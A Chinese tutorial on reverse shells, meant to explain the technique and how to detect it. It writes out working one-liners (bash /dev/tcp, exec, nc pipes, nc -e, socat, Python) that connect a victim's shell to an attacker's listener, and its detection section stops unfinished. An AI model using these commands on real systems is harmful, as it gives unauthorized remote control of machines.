反弹Shell

0x00 引言

  在一套完整的攻击流程中，反弹Shell是非常关键的一步，攻击者可以借此获取受害机器的文件系统控制权。本文介绍常见的几种反弹Shell方法，以及提供一些简单的检测反弹的思路。

0x01 基础知识

  在开始之前需要先理解什么是反弹Shell，以及学会如何甄别受害机器的特征。

1 反弹Shell流程
2 文件描述符
3 重定向
4 查看受害机器的连接状态

1、反弹Shell流程
  假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。但是在某些情况下，正向连接可能会被阻止，比如防火墙屏蔽。为了解决这个问题，便衍生出了反弹Shell的方法。
  反弹Shell，即攻击者指定服务端并开启某端口监听，受害者主机主动连接攻击者的服务端程序。

2、文件描述符
  linux文件描述符可以理解为linux跟踪打开文件而分配的一个数字句柄，这个数字本质上是一个文件句柄，通过句柄就可以实现文件的读写操作。进程启动后再打开新的文件，描述符会自动依次增加。每一个新进程都会继承其父进程的文件描述符，因此所有的shell命令（本质上也是启动新进程），都会默认有三个文件描述符，即标准输入、标准输出、标准错误输出符号。查看文件描述符的方法是:

$ ll /proc/'进程PID'/fd
$ ls -lah /proc/'进程PID'/fd
'
lrwx------ 1 root root 64 Sep 17 13:46 0 -> /dev/pts/1
lrwx------ 1 root root 64 Sep 17 13:46 1 -> /dev/pts/1
lrwx------ 1 root root 64 Sep 17 13:46 2 -> /dev/pts/1
'

  0代表标准输入，1代表标准输出，2代表标准错误输出。默认情况下其都指向/dev/pts/1这个设备(/dev/tty/0代表终端0，/dev/pts/1代表远程终端1，具体区别查看文献^[1])。

3、重定向
  Linux支持将标准的输入输出重新指定到其他文件、socket号或者pipe管道上，这里介绍如何进行文件描述符重定向:

# 输入重定向 - <
# 0可以省略
$ cat 0< 'XXX.txt'
$ cat < 'XXX.txt'
' 重定向后的文件描述符
0 -> 'XXX.txt'
1 -> /dev/pts/1
2 -> /dev/pts/1
'

# 输出重定向 - >
# 默认为标准输出
$ echo "123" > 'XXX.txt'
$ echo "123" 1> 'XXX.txt'
' 重定向后的文件描述符
0 -> /dev/pts/1
1 -> 'XXX.txt'
2 -> /dev/pts/1
'
# 也可以改为标准错误输出
$ echo "123" 2> 'XXX.txt'
' 重定向后的文件描述符
0 -> /dev/pts/1
1 -> /dev/pts/1
2 -> 'XXX.txt'
'

# 标准输出与标准错误输出重定向(下面3种形式完全等价)
$ ls >& 'XXX.txt'
$ ls &> 'XXX.txt'
$ ls > 'XXX.txt' 2> &1 # 将标准输出给txt文件,同时将标准错误输出到标准输入设备上

# 输入重定向到指定设备
$ cat < &5 # 输入重定向到文件描述符5所指向的设备

4、查看受害机器的连接状态

# 定位测试的可疑进程PID
$ netstat -natp |grep '劫持的端口号'
# 或者
$ ps -ef |grep '反弹shell命令'

# 根据PID号查看其文件描述符
# 0、1、2 即为标准文件描述符，562245代表socket连接号
$ ll /proc/'PID号'/fd
'
lrwx------ 1 root root 64 Sep 22 18:17 0 -> /dev/pts/18
lrwx------ 1 root root 64 Sep 22 18:17 1 -> /dev/pts/18
lrwx------ 1 root root 64 Sep 22 18:17 2 -> /dev/pts/18
lrwx------ 1 root root 64 Sep 22 18:17 255 -> /dev/pts/18
'

# 查看socket连接状态
# 本地IP:端口为5126320A:0016，将16进制转为10进制，即为81 38 50 10:22，即10.50.38.81:22
# 远程IP:端口为3B1C140A:C9E1，将16进制转为10进制，即为59 28 20 10:51681，即10.20.28.59:51681
# socket连接号为562245
$ cat /proc/net/tcp |grep 562245
'
sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     
14: 5126320A:0016 3B1C140A:C9E1 01 00000000:00000000 02:0008870C 00000000     0        0 562245 2 000000005eb7a0ef 22 5 1 17 -1
'

# 查看终端中正在运行的进程
$ ps -t 1
# 或者
$ ps -a
'
  PID TTY          TIME CMD
27306 pts/1    00:00:00 bash
29585 pts/1    00:00:00 cat
29586 pts/1    00:00:00 bash
'

0x02 常见方法

  在以下方法^[2]中，攻击端大部分均使用nc工具开启端口监听(特殊的攻击端会在特定方法中描述):

# -l 监听模式
# -v 输出交互或错误信息
# -p 本地端口
$ nc -lvp '监听端口'

  且在一个正常的nc服务运行流程中，客户端终端的标准输入输出应该是不会被篡改的，其流程图如下:

1 内置命令
  1.1 bash直接重定向
  1.2 exec添加描述符重定向
  1.3 管道文件
  1.4 匿名双管道
2 第三方工具
  2.1 nc
  2.2 socat
  2.3 python

1、内置命令
  以下几种方法使用Linux内置命令，不需要另外安装工具。

1.1、bash直接重定向

# 受害机器执行命令
$ bash -i >& /dev/tcp/'监听IP'/'监听端口' 0>&1
# 或者
$ bash -i >& /dev/tcp/'监听IP'/'监听端口' <&2

# 输出结果
'
lrwx------ 1 root root 64 Sep 17 16:16 0 -> socket:[1205356]
lrwx------ 1 root root 64 Sep 17 16:16 1 -> socket:[1205356]
lrwx------ 1 root root 64 Sep 17 16:16 2 -> socket:[1205356]
'

  使用bash是最简单直接的反弹Shell方法，其原理是将一个终端进程的标准输入输出以及标准错误输出全部重定向到某个socket连接上，实现流程图如下:

1.2、exec添加描述符重定向

# 受害机器执行命令
exec 5<>/dev/tcp/'监听IP'/'监听端口';cat <&5|while read line;do $line >&5 2>&1;done

# 输出结果
'
lrwx------ 1 root root 64 Sep 18 13:48 0 -> /dev/pts/17
l-wx------ 1 root root 64 Sep 18 13:48 1 -> /dev/pts/17
lrwx------ 1 root root 64 Sep 18 13:48 2 -> /dev/pts/17
lrwx------ 1 root root 64 Sep 18 13:48 255 -> /dev/pts/17
lrwx------ 1 root root 64 Sep 18 13:48 5 -> socket:[41567]
'

  exec命令可以指定一个大于3的文件描述符作为文件的句柄，由于重定向了标准输入输出到大于3的描述符，因此会多产生一个255的文件描述符(在不同终端内，该描述符数字不同)。while read line句式^[3]能逐行读取输出并将其赋值给line变量，继而在do done内部实现对变量的操作，下面详细分析实现原理:

# 将远程连接socket的句柄用文件描述符5来表示
exec 5<>/dev/tcp/'监听IP'/'监听端口';

# 将从socket句柄传来的字符串输出
cat <&5

# 逐行读取符号5中传来的命令，并赋值给line变量
|while read line;do XXX;done

# 执行line字符串的指令并将标准输入输出以及错误输出重定向到文件描述符5指向的socket
$line >&5 2>&1

1.3、管道文件

# 受害机器执行命令
mknod backpipe p; nc '监听IP' '监听端口' <backpipe | /bin/bash 1>backpipe 2>backpipe

# 输出结果
'
lr-x------ 1 root root 64 Sep 17 16:19 0 -> /root/backpipe
l-wx------ 1 root root 64 Sep 17 16:19 1 -> pipe:[1339090]
lrwx------ 1 root root 64 Sep 17 16:19 2 -> /dev/pts/1
lrwx------ 1 root root 64 Sep 17 16:19 3 -> socket:[1339092]
lrwx------ 1 root root 64 Sep 17 16:19 5 -> socket:[564686]
'

  mknod命令能够新建一个管道，上述新建了一个名为backpipe的管道文件。nc与bash均为常驻进程，两个进程间使用匿名管道’|’连接。最终实现了一个单向循环，下面详细分析实现原理:

# 新建一个管道文件backpipe
# 等价于 mknod -p backpipe
# -p 创建FIFO
mknod backpipe p

# 将nc进程的输出作为bash进程的输入
nc '监听IP' '监听端口' | /bin/bash

# 将nc的标准输入修改为backpipe管道
nc '监听IP' '监听端口' <backpipe

# 将bash进程的标准输出、标准错误输出传递给backpipe管道
/bin/bash 1>backpipe 2>backpipe

1.4、匿名双管道
  由于匿名双管道方法的特殊性，攻击端的监听命令需要改变为如下:

# 监听命令
# 可自行修改端口
ncat -lvvp 7777 # 或者 nc -lvp 7777
# 监听命令(另开终端)
# 可自行修改端口
ncat -lvvp 8888 # 或者 nc -lvp 8888

# 受害机器执行命令
nc '监听IP' 7777 | /bin/bash | nc '监听IP' 8888

# 输出结果
'
7777端口
lrwx------ 1 root root 64 9月  17 16:30 0 -> /dev/pts/0
l-wx------ 1 root root 64 9月  17 16:30 1 -> pipe:[366671]
lrwx------ 1 root root 64 9月  17 16:30 2 -> /dev/pts/0
lrwx------ 1 root root 64 9月  17 16:30 3 -> socket:[366678]

8888端口
lr-x------ 1 root root 64 9月  17 16:30 0 -> pipe:[366673]
lrwx------ 1 root root 64 9月  17 16:30 1 -> /dev/pts/0
lrwx------ 1 root root 64 9月  17 16:30 2 -> /dev/pts/0
lrwx------ 1 root root 64 9月  17 16:30 3 -> socket:[366679]
'

  其原理较为简单， 执行流程图如下:

2、第三方工具
  使用第三方工具，实际上与内置工具大同小异，其实际的实现方法与上述类似，这边罗列几个典型的工具。

2.1、nc

# 受害机器执行命令
# 注意，必须使用指定版本的nc工具，否则无效
nc -e /bin/sh '监听IP' '监听端口'

2.2、socat

# 监听命令
socat file:`tty`,raw,echo=0 tcp-listen:'监听端口'

# 受害机器执行命令
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:'监听IP':'监听端口'

# 输出结果
'
lrwx------ 1 root root 64 Sep 18 10:01 0 -> /dev/pts/1
lrwx------ 1 root root 64 Sep 18 10:01 1 -> /dev/pts/1
lrwx------ 1 root root 64 Sep 18 10:01 2 -> /dev/pts/1
lrwx------ 1 root root 64 Sep 18 10:01 3 -> socket:[1585844]
lrwx------ 1 root root 64 Sep 18 10:01 4 -> socket:[1585845]
lrwx------ 1 root root 64 Sep 18 10:01 5 -> socket:[564686]
lrwx------ 1 root root 64 Sep 18 10:01 6 -> /dev/ptmx
lr-x------ 1 root root 64 Sep 18 10:01 7 -> /var/lib/sss/mc/group
lrwx------ 1 root root 64 Sep 18 10:01 8 -> socket:[1585849]
'

  这工具按ctrl+c不会断开连接，而且通过文件描述符比较难辨别，暂时不知道如何探测。

2.3、python

# 受害机器执行命令
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.50.38.176',2333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

  此种方法使用os的subprocess在本地开启一个子进程，启动bash交互模式，标准输入、标准输出、标准错误输出被重定向到了远程。实质就是Bash直接重定向。

0x03 检测思路

1 旧的检测方案及其误报原因
2 方案改进

1、旧的检测方案及其误报原因
  旧的检测方案为检查所有进程的文件描述符，一旦其socket连接号能够在/proc/net/tcp中找到对应的远程连接IP，则会上报反弹Shell攻击。找到两台机器，其误报进程信息如下:

# 误报案例一
' /usr/lib/deepin-daemon/uos-license-agent
lr-x------ 1 root root 64 9月  18 11:31 0 -> /dev/null
lrwx------ 1 root root 64 9月  18 11:31 1 -> socket:[31915]
lrwx------ 1 root root 64 9月  18 11:31 2 -> socket:[31915]
'

# 误报案例二
' /dbappsecurity/rpc_service/rpc_service runservice
lr-x------ 1 root root 64 Sep 18 10:22 0 -> /dev/null
lrwx------ 1 root root 64 Sep 18 10:22 1 -> socket:[27060]
lrwx------ 1 root root 64 Sep 18 10:22 2 -> socket:[27060]
'

  容易分析，误报原因为标准输入未被劫持，但是标准输出与标准错误输出被劫持，反弹Shell未形成一条链。

2、方案改进

0x04 引用文献

[1]https://blog.csdn.net/mountzf/article/details/51735691
[2]https://www.cnblogs.com/LittleHann/p/12038070.html
[3]https://blog.csdn.net/worldchinalee/article/details/104049141